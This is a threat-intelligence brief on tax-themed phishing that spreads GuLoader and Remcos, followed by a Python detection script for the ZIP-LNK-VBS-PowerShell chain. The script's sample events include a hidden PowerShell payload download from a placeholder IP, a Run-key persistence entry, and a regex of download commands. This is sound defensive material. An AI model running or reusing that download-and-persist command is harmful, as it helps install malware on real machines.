Tax Season Brings New Tax-themed Phishing Campaigns

Source: Red Canary

Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Red Canary

Phishing campaigns with financial themes are observed throughout the year, but their frequency rises before and during tax season, particularly campaigns using tax and accounting lures. This applies to businesses in all sectors, not only the financial industry. The most recent campaigns reported by Red Canary have delivered the GuLoader malware downloader, which is used to distribute remote access trojans (RATs) such as Remcos. The tax-themed malicious attachments reference new orders for accounting services, documentation involving the IRS, or tax files belonging to clients. Attachments in the campaign have combined a password-protected zip file containing a shortcut (LNK) file with a Visual Basic (VBS) script that launches PowerShell to download a remote payload. Alongside the malicious activity, the shortcut file also opens a decoy PDF to convince the victim that they have only opened a harmless PDF document. Several attack chains end with the installation of a RAT for surveillance or the download of additional malware. Red Canary notes that the key "indicators of successful Remcos installation include suspicious registry changes for persistence and malicious processes making outbound network connections to C2 IP addresses."

Anvilogic Scenarios:

  • LNK & LOLBin
  • ZIP/LNK Evasion Tactics Lead to PS, Persistence/System Impact

Anvilogic Use Cases:

  • Compressed File Execution
  • Wscript/Cscript Execution
  • Invoke-WebRequest Command
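The following is an added detection example, not code from Red Canary or Anvilogic. It runs the three use cases above (Compressed File Execution, Wscript/Cscript Execution, Invoke-WebRequest Command) plus the Run-key persistence indicator from the report over constructed process-creation and registry events that mimic the chain described above: zip opened in place, LNK launches a VBS via wscript, PowerShell downloads a payload and writes an autostart key, while a decoy PDF and a benign admin PowerShell session sit alongside. The event layout (pid, ppid, image, cmd; registry events with target), the archive temp-folder patterns and the severity labels are assumptions for this example, not any product's schema.

```python
"""Detection logic for the ZIP -> LNK -> VBS -> PowerShell download chain.

All events below are constructed for this example and are not data from the
Red Canary report. The Sysmon-like event shape is assumed, not a real schema.
"""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Temp folders where archives are expanded when opened in place
# (Explorer uses Temp<n>_<name>.zip; Rar$ and 7z<id> are WinRAR/7-Zip).
# Assumed patterns; tune to what your endpoint telemetry actually shows.
ARCHIVE_TEMP_RE = re.compile(
    r"\\temp\\(temp\d+_[^\\]+\.zip|rar\$[^\\]+|7z[0-9a-z]+)\\", re.IGNORECASE)

# PowerShell download primitives: Invoke-WebRequest and its iwr/curl/wget
# aliases, WebClient download methods, and BITS transfers.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer)", re.IGNORECASE)

# Autostart registry locations commonly used for persistence.
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)

# Constructed sample telemetry (203.0.113.10 is a documentation address).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 1, "ppid": 0,
     "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"type": "process", "pid": 2, "ppid": 1,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\a\AppData\Local\Temp\Temp1_IRS_Docs.zip\order.vbs"'},
    {"type": "process", "pid": 3, "ppid": 2,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "Invoke-WebRequest -Uri '
            'http://203.0.113.10/update.bin -OutFile $env:TEMP\\update.bin"'},
    {"type": "registry", "pid": 3,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "process", "pid": 4, "ppid": 1,  # decoy PDF opened for the user
     "image": r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
     "cmd": r'Acrobat.exe "C:\Users\a\AppData\Local\Temp\IRS_Notice.pdf"'},
    {"type": "process", "pid": 5, "ppid": 1,  # benign admin PowerShell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -Command Get-Service"},
]


def basename(image):
    return PureWindowsPath(image).name.lower()


def detect(events):
    """Return (pid, rule, severity) tuples for every rule each event matches."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        pid = e["pid"]
        proc = procs.get(pid)
        name = basename(proc["image"]) if proc else ""
        if e["type"] == "registry":
            # Run-key persistence written by a script host or PowerShell is
            # one of the report's indicators of a successful RAT install.
            if RUN_KEY_RE.search(e["target"]) and name in SCRIPT_HOSTS | POWERSHELL:
                alerts.append((pid, "run_key_persistence", "high"))
            continue
        cmd = e["cmd"]
        parent = procs.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        if ARCHIVE_TEMP_RE.search(cmd):
            alerts.append((pid, "compressed_file_execution", "medium"))
        if name in SCRIPT_HOSTS:
            alerts.append((pid, "wscript_cscript_execution", "medium"))
        if name in POWERSHELL and DOWNLOAD_RE.search(cmd):
            alerts.append((pid, "invoke_webrequest_command", "medium"))
            if parent_name in SCRIPT_HOSTS:
                # The full chain from the page: script host -> downloading PowerShell.
                alerts.append((pid, "script_host_to_ps_download", "high"))
    return alerts


def rules_by_pid(events):
    """Group matched rule names per process id."""
    out = {}
    for pid, rule, _sev in detect(events):
        out.setdefault(pid, set()).add(rule)
    return out


def high_severity_pids(events):
    """Processes that matched at least one high-severity rule."""
    return sorted({pid for pid, _rule, sev in detect(events) if sev == "high"})


if __name__ == "__main__":
    for pid, rule, sev in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule} [{sev}]")
```

The individual rules are deliberately medium severity because each fires on legitimate activity too (users open zipped invoices, admins run PowerShell). The parent-child correlation is what raises confidence: a download cmdlet in a PowerShell process whose parent is wscript.exe or cscript.exe, followed by a Run-key write from the same process, is the sequence the report describes and is worth paging on.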
